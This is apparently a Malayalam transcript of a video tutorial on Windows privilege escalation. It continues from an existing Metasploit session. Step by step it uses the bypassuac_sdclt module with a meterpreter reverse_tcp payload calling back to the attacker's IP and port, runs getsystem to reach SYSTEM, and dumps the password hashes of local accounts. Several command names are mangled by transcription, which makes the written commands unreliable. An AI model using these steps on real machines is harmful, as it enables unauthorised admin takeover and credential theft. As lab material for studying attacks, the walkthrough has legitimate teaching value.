ഹാക്കേഴ്സിന് ഒരു മെഷീനിൽ ആക്സസ് കിട്ടിയാൽ അതിലുള്ള വൾണറബിലിറ്റി വെച്ച് ഒരു അഡ്മിൻ ആക്സസ് ഗെയിൻ ചെയ്യാൻ ട്രൈ ചെയ്യും. കാരണം ഇനീഷ്യലി കിട്ടുന്ന ആക്സസ് പോയിന്റ് എപ്പോഴും ലോ പ്രിവിലേജ് ഉള്ള കണക്ഷൻ ആയിരിക്കും. ആ കണക്ഷന് ഒരുപാട് റെസ്ട്രിക്ഷൻസ് ഉണ്ടാവും. ഫോർ എക്സാമ്പിൾ, ലോ പ്രിവിലേജ് ഉള്ള യൂസറിനെ കൊണ്ട് ഹാഷ് ഡംപ് പോലുള്ള കമാൻഡ്സ് റൺ ചെയ്താൽ അത് റൺ ആവില്ല. അതുകൊണ്ട് തന്നെ ഹാക്കേഴ്സ് ഹൈ ലെവലായ അഡ്മിൻ ഓർ റൂട്ട് ആക്സസ് കിട്ടാൻ ട്രൈ ചെയ്യും. പ്രിവിലേജ് എസ്കലേഷൻ പ്രോസസ് എന്നാണ് ഇതിനെ പറയുന്നത്. വിൻഡോസിൽ യൂസർ അക്കൗണ്ട് കൺട്രോൾ എന്ന് പറഞ്ഞൊരു ഫീച്ചർ ഉണ്ട്. അൺഓതറൈസ്ഡ് ചേഞ്ചസ് പ്രിവെന്റ് ചെയ്യാൻ വേണ്ടിയാണ് ഈ ഫീച്ചർ. നോർമലി വിൻഡോസിൽ റൺ ആവുന്ന ആപ്ലിക്കേഷൻ എല്ലാം സ്റ്റാൻഡേർഡ് യൂസർ പ്രിവിലേജിൽ മാത്രമേ റൺ ആവുള്ളൂ. പിന്നെ ഏതെങ്കിലും ആപ്ലിക്കേഷന് അഡ്മിൻ ആക്സസ് വേണമെങ്കിൽ റൺ ആസ് അഡ്മിനിസ്ട്രേറ്റർ എന്ന ഓപ്ഷനിലൂടെ റൺ ചെയ്യണം. അതിൽ ക്ലിക്ക് ചെയ്താൽ യൂസർ അക്കൗണ്ട് കൺട്രോൾ എന്ന് പറഞ്ഞ പ്രോംപ്റ്റ് പോപ്പ് ആവും. അതിൽ എസ് കൊടുത്താൽ മാത്രമേ ആപ്ലിക്കേഷൻ അഡ്മിൻ പ്രിവിലേജിൽ റൺ ആവുള്ളൂ. ഇത് സെക്യൂരിറ്റിക്ക് വേണ്ടിയാണ് ഈ ഫീച്ചർ വിൻഡോസിലുള്ളത്. പിന്നെ വിൻഡോസിൽ ഇനീഷ്യലി ക്രിയേറ്റ് ചെയ്യുന്ന ഒരു യൂസർ അക്കൗണ്ട് നോർമൽ യൂസർ ആയിരിക്കും. പക്ഷേ ആ യൂസറിന് അഡ്മിൻ പ്രിവിലേജസ് ഉണ്ടാവും. ഒരു അഡ്മിന് എന്ത് ചെയ്യാൻ പറ്റുമോ അതെല്ലാം ഈ യൂസറിന് ചെയ്യാൻ പറ്റും. ഈ വീഡിയോയിലൂടെ ഒരു അഡ്മിൻ ആക്സസ് എങ്ങനെ കിട്ടും അതാണ് നമ്മൾ നോക്കാൻ പോകുന്നത്. കാളി ലിനക്സിൽ ഓൾറെഡി ഒരു വിൻഡോസ് മെഷീൻ്റെ റിമോട്ട് കണക്ഷൻ ഇവിടെ കിട്ടിയിട്ടുണ്ട്. ഇതെങ്ങനെ കിട്ടിയതെന്നുള്ള വീഡിയോ ഓൾറെഡി ചാനലിൽ അപ്ലോഡ് ചെയ്തിട്ടുണ്ട്. അതൊന്ന് ചെക്ക് ചെയ്ത് നോക്കുക. അതിൻ്റെ കണ്ടിന്യൂഷൻ ആയിട്ടാണ് ഈ വീഡിയോ. ഇനി ടെർമിനലിൽ ഗെറ്റ് UID എന്ന കമാൻഡ് ടൈപ്പ് ചെയ്യുക. കോയ എന്നൊരു യൂസർ നെയിം അവിടെ കാണാം. കോയ എന്നൊരു യൂസറിൻ്റെ റിമോട്ട് കണക്ഷനാണ് ഇവിടെ കിട്ടിയിരിക്കുന്നത്. ഇനി ആ യൂസറിന് അഡ്മിൻ പ്രിവിലേജ് ഉണ്ടോ എന്ന് ചെക്ക് ചെയ്യണം. അതിനുവേണ്ടി ഷെൽ കമാൻഡ് ടൈപ്പ് ചെയ്യുക. ഇത് ടൈപ്പ് ചെയ്താൽ നേറ്റീവ് വിൻഡോസ് കമാൻഡ് പ്രോംപ്റ്റ് കിട്ടും. അതിനുവേണ്ടിയാണ് ഈ കമാൻഡ് കൊടുക്കുന്നത്. അതിനുശേഷം whoami/groups എന്ന കമാൻഡ് ടൈപ്പ് ചെയ്യുക. ഇവിടെ നോക്കിയാൽ ഇതിൽ മെമ്പേഴ്സ് ഓഫ് അഡ്മിനിസ്ട്രേറ്റേഴ്സ് ഗ്രൂപ്പ് എന്ന ഇത് കാണാം, ഗ്രൂപ്പ് നെയിം. പിന്നെ ബിൽറ്റ് ഇൻ /അഡ്മിനിസ്ട്രേറ്റേഴ്സ് എന്നും കാണാം. ഇനി ഇതിന്റെ ആട്രിബ്യൂട്ട്സ് കോളം നോക്കിയാൽ ഗ്രൂപ്പ്സ് യൂസ്ഡ് ഫോർ ഡിനൈ ഓൺലി എന്ന് കൊടുത്തിട്ടുണ്ട്. ഇതുകൊണ്ട് ഉദ്ദേശിക്കുന്നത് ഈ യൂസറിന് അഡ്മിൻ ആക്സസ് ഉണ്ട്, പക്ഷേ യൂസർ അക്കൗണ്ട് കൺട്രോള് അഡ്മിൻ ആക്സസിന് പ്രിവെന്റ് ചെയ്യണം ഇവിടെ. ഈ യൂസർ യൂസ് ചെയ്ത് ഇതിന്റെ സെക്യൂരിറ്റി ബൈപ്പാസ് ചെയ്താൽ അഡ്മിൻ ആക്സസ് കിട്ടും. എക്സിറ്റ് കമാൻഡ് യൂസ് ചെയ്ത് ഷെല്ലിൽ നിന്ന് എക്സിറ്റ് ആവുക. എന്നിട്ട് ബാക്ക്ഗ്രൗണ്ട് എന്ന് ടൈപ്പ് ചെയ്യും. ഇപ്പോൾ നമ്മളുള്ളത് മൾട്ടി ഹാൻഡ്ലർ എന്ന എക്സ്പ്ലോയിറ്റിലാണ്. അത് ബാക്ക്ഗ്രൗണ്ടിൽ റൺ ആവും. ഈ എക്സ്പ്ലോയിറ്റ് ആണ് റിമോട്ട് കണക്ഷൻ തന്നത്. എന്നിട്ട് സെക്ഷൻസ് -l എന്ന് ടൈപ്പ് ചെയ്താൽ ഈ കമാൻഡ് അവിടെ റൺ ആവുന്നത് കാണാം. ഇനി യൂസർ അക്കൗണ്ട് കൺട്രോൾ ബൈപ്പാസ് ചെയ്യാൻ വേണ്ടി വേറൊരു എക്സ്പ്ലോയിറ്റ് റൺ ചെയ്യണം. ടെർമിനലിൽ യൂസ് exploit/windows/local/bypass UAC_SDCLT എന്ന് ടൈപ്പ് ചെയ്യുക. ഈ എക്സ്പ്ലോയിറ്റ് യൂസ് ചെയ്തിട്ടാണ് യൂസർ അക്കൗണ്ട് കൺട്രോളിനെ ബൈപ്പാസ് ചെയ്ത് അഡ്മിൻ ആക്സസ് ചെയ്യുന്നത്. ഇനി ഈ കമാൻഡ് എന്താണെന്ന് വെച്ചാൽ വിൻഡോസിൽ ബാക്കപ്പ് ആൻഡ് റീസ്റ്റോർ എന്ന് പറഞ്ഞൊരു യൂട്ടിലിറ്റി ഉണ്ട്. അതായത് sdlct.exe എന്ന ഫയൽ ബൈപ്പാസ് UAC എക്സ്പ്ലോയിറ്റ് യൂസ് ചെയ്ത് അതിനെ റൺ ചെയ്യും. sdclt.exe ഫയലിന് ഓട്ടോ എലിവേറ്റ് എന്നൊരു ഫീച്ചർ ഉണ്ട്. ഈ ഫയൽ റൺ ചെയ്താൽ യൂസർ അക്കൗണ്ട് കൺട്രോൾ പ്രോംപ്റ്റ് പോപ്പ് ആവില്ല. ഇതൊരു വിൻഡോസ് ബിൽറ്റ് ഇൻ ഫയൽ ആയതുകൊണ്ട് വിൻഡോസ് ഇതിനെ ട്രസ്റ്റ് ചെയ്ത് ഓട്ടോമാറ്റിക്കലി റൺ ചെയ്യും. ഈ ഫയലിനെ എക്സ്പ്ലോയിറ്റ് ചെയ്തിട്ടാണ് അഡ്മിൻ ആക്സസ് എടുക്കുന്നത്. അതിനുശേഷം റിവേഴ്സ് TCPന്റെ പേലോഡ് സെറ്റ് ചെയ്ത് കൊടുക്കണം. ആ പേലോഡും ഈ എക്സ്പ്ലോയിറ്റും പ്രോപ്പർ കമ്മ്യൂണിക്കേഷന് വേണ്ടിയാണ് ഇത് സെറ്റ് ചെയ്യുന്നത്. അപ്പോൾ അതിനുവേണ്ടി കമാൻഡ് പ്രോംപ്റ്റ് സെറ്റ് പേലോഡ് Windows/Interspeeder/meterpeter/reverse_TCP എന്ന് ടൈപ്പ് ചെയ്യുക. ഈ പേലോഡ് യൂസ് ചെയ്തിട്ടാണ് ഒരു റിവേഴ്സ് ഷെൽ പേലോഡ് ക്രിയേറ്റ് ചെയ്തത്. അതുകൊണ്ടാണ് ഈ പേലോഡ് ഇവിടുത്തെ ഈ എക്സ്പ്ലോയിറ്റിലും മൾട്ടി ഹാൻഡ്ലർ എന്ന എക്സ്പ്ലോയിറ്റിലും കൊടുത്തിരിക്കുന്നത്. എന്നാലും പ്രോപ്പർ കമ്മ്യൂണിക്കേഷൻ എസ്റ്റാബ്ലിഷ് ആവുള്ളൂ ഇവിടെ. അത് കൊടുത്തതിന് ശേഷം സെറ്റ് സെഷൻ 1 എന്ന് കൊടുക്കുക. ഇവിടെ ഇത് കൊടുക്കുന്നത് മീറ്റർപ്രീറ്റർ എക്സ്പ്ലോയിറ്റും ബൈപ്പാസ് UAC എന്ന എക്സ്പ്ലോയിറ്റും കൂടി ലിങ്ക് ചെയ്യാൻ വേണ്ടിയാണ്. കാരണം ബൈപ്പാസ് UAC എന്ന കമാൻഡിന് ടാർഗറ്റ് മെഷീൻ്റെ ഡാറ്റയൊന്നും ഉണ്ടാവില്ല. ഏത് മെഷീനെ അറ്റാക്ക് ചെയ്യണമെന്നുള്ള ഒരു ഇൻഫർമേഷനും ഇല്ല. പക്ഷേ മീറ്റർപ്രീറ്റർ എക്സ്പ്ലോയിറ്റ് യൂസ് ചെയ്തിട്ടാണ് വിൻഡോസ് മെഷീനെ അറ്റാക്ക് ചെയ്തത്. അതുകൊണ്ട് തന്നെ ആ മെഷീന് ടാർഗറ്റ് മെഷീൻ്റെ ഡാറ്റയെല്ലാം അറിയാം. പക്ഷേ ബൈപ്പാസ് UACക്ക് അതിനെക്കുറിച്ചുള്ള ഒന്നും അറിയില്ല. ബ്ലാങ്ക് ആയിരിക്കും ഇതിൻ്റെ ഡാറ്റ എന്ന് പറയുന്നത്. അതുകൊണ്ടാണ് ഇതിനെ ലിങ്ക് ചെയ്യുന്നത്. അതിനുവേണ്ടിയാണ് സെറ്റ് സെഷൻ 1 എന്ന കമാൻഡ് യൂസ് ചെയ്യുന്നത്. 1 കൊണ്ട് ഉദ്ദേശിക്കുന്നത് ആക്റ്റീവ് സെക്ഷൻസിൽ ID എന്ന് പറയുന്നത് 1 ആണ്. ഈ മീറ്റർപ്രീറ്റർ റൺ ചെയ്യുന്ന ബാക്ക്ഗ്രൗണ്ട് സെക്ഷൻ. അതുകൊണ്ടാണ് 1 കൊടുക്കുന്നത്. വേറെ ഏതെങ്കിലും സെക്ഷനിലാണെങ്കിൽ അതിൻ്റെ ID ആയിരിക്കും ഇവിടെ കൊടുക്കുക. ഇനി അടുത്തത് കാളി ലിനക്സിൻ്റെ IP അഡ്രസ്സ് സെറ്റ് ചെയ്യണം. IP അഡ്രസ്സ് സെറ്റ് ചെയ്യാൻ വേണ്ടി സെറ്റ് lhost കാളി ലിനക്സിൻ്റെ IP അഡ്രസ്സ് കൊടുക്കുക 192.168.1.3. എന്നിട്ട് അതിനുശേഷം പോർട്ട് സെറ്റ് ചെയ്യണം. അതിനുവേണ്ടി സെറ്റ് ഹെൽപ്പ് പോർട്ട് 4445 എന്ന് കൊടുക്കുക.
മൾട്ടി ഹാൻഡ്ലർ എക്സ്പ്ലോയിറ്റ് റൺ ആവുന്നത് 4444 അതുകൊണ്ട് തന്നെ ആ പോർട്ട് നമ്പർ ഇവിടെ കൊടുത്താൽ ഇത് വർക്കാവില്ല, വേറൊരു പോർട്ട് നമ്പർ കൊടുക്കണം. അതുകൊണ്ടാണ് 4445 കൊടുക്കുന്നത്. ഇതെല്ലാം സെറ്റ് ചെയ്ത് കൊടുത്തതിന് ശേഷം എക്സ്പ്ലോയിറ്റ് റൺ ചെയ്യുക, റൺ കമാൻഡ് യൂസ് ചെയ്തിട്ട്. ഇപ്പോൾ പോർട്ട് 4445 ഒരു TCP ഹാൻഡ്ലർ സ്റ്റാർട്ട് ചെയ്തിട്ടുണ്ട്. ഇനി അതിനുശേഷം ഇത് എക്സ്പ്ലോയിറ്റ് റണ്ണായി കംപ്ലീറ്റ് ആയതിനു ശേഷം വേറൊരു കണക്ഷൻ ഇവിടെ കിട്ടും. അതൊരു അഡ്മിൻ ആക്സസ് ഉള്ളൊരു കണക്ഷൻ ആയിരിക്കും. കണക്ഷൻ കിട്ടിയിട്ടുണ്ട്. ഇനി ഗെറ്റ് UID എന്ന കമാൻഡ് കൊടുത്താൽ സെയിം റിസൾട്ട് തന്നെയാണ് വന്നത് ഇവിടെയും. ഇനി ഗെറ്റ് സിസ്റ്റം എന്ന കമാൻഡ് കൊടുക്കുക. ഈ കമാൻഡ് യൂസ് ചെയ്ത് ലോ പ്രിവിലേജിൽ നിന്ന് ഹൈ പ്രിവിലേജ് ആക്സസ് കിട്ടും. അതിനുവേണ്ടിയാണ് ഈ കമാൻഡ് യൂസ് ചെയ്യുന്നത്. ഇനി ഗെറ്റ് UID എന്ന കമാൻഡ് കൊടുത്താൽ ഇവിടെ യൂസർ നെയിം മാറിയത് കാണാം. NT-authority/system എന്ന യൂസർ നെയിമാണ് കാണുന്നത്. വിൻഡോസിലെ ബിൽറ്റ് ഇൻ വിൻഡോസ് അക്കൗണ്ടാണ്. ഇതാണ് ഏറ്റവും ഹയസ്റ്റ് പോസിബിൾ ആയ സിസ്റ്റം പ്രിവിലേജ് വിൻഡോസിൽ. ഇതിൽ അൺറെസ്ട്രിക്റ്റഡ് ആക്സസ് ആണ്. എല്ലാ വിൻഡോസ് മെഷീൻ്റെ ഫുൾ കൺട്രോളും നമുക്ക് കിട്ടിയിട്ടുണ്ട് ഇപ്പോൾ. ഇനി അതൊന്നും ചെക്ക് ചെയ്യാൻ വേണ്ടി കമാൻഡ് പ്രോംപ്റ്റിൽ #dump എന്ന കമാൻഡ് ടൈപ്പ് ചെയ്യുക. ഈ കമാൻഡ് ഒരിക്കലും ഒരു നോർമൽ യൂസറോ അല്ലെങ്കിൽ സ്റ്റാൻഡേർഡ് യൂസറിന് ഇത് ആക്സസ് ചെയ്യാൻ പറ്റില്ല. കാരണം ഇത് ഹാഷ് വാല്യൂസ് ആണ്. ഒരു അഡ്മിന് മാത്രമേ ഇത് റൺ ചെയ്ത് അതിൻ്റെ റിസൾട്ട് കിട്ടുകയുള്ളൂ. അപ്പോൾ അതിൽ നമുക്ക് റിസൾട്ട് ഇവിടെ കിട്ടിയിട്ടുണ്ട്. അഡ്മിനിസ്ട്രേറ്റർ, ഡിഫോൾട്ട് അക്കൗണ്ട്, ഗസ്റ്റ്, കോയ, അങ്ങനെ ആ യൂസറിൻ്റെ പാസ്വേഡ് സെറ്റ് ചെയ്തതിൻ്റെ ഹാഷ് വാല്യൂ ആയിരിക്കും ഇതിൽ സ്റ്റോർ ആവുക. അതെല്ലാം കിട്ടിയിട്ടുണ്ട്. ഈ വീഡിയോയിലൂടെ എങ്ങനെ ഒരു വിൻഡോസ് മെഷീനിൽ അഡ്മിൻ ആക്സസ് കിട്ടുക എന്ന് നോക്കി. ഓക്കെ, ഇനി അടുത്ത വീഡിയോയിലും കാണും വരെ ബൈ.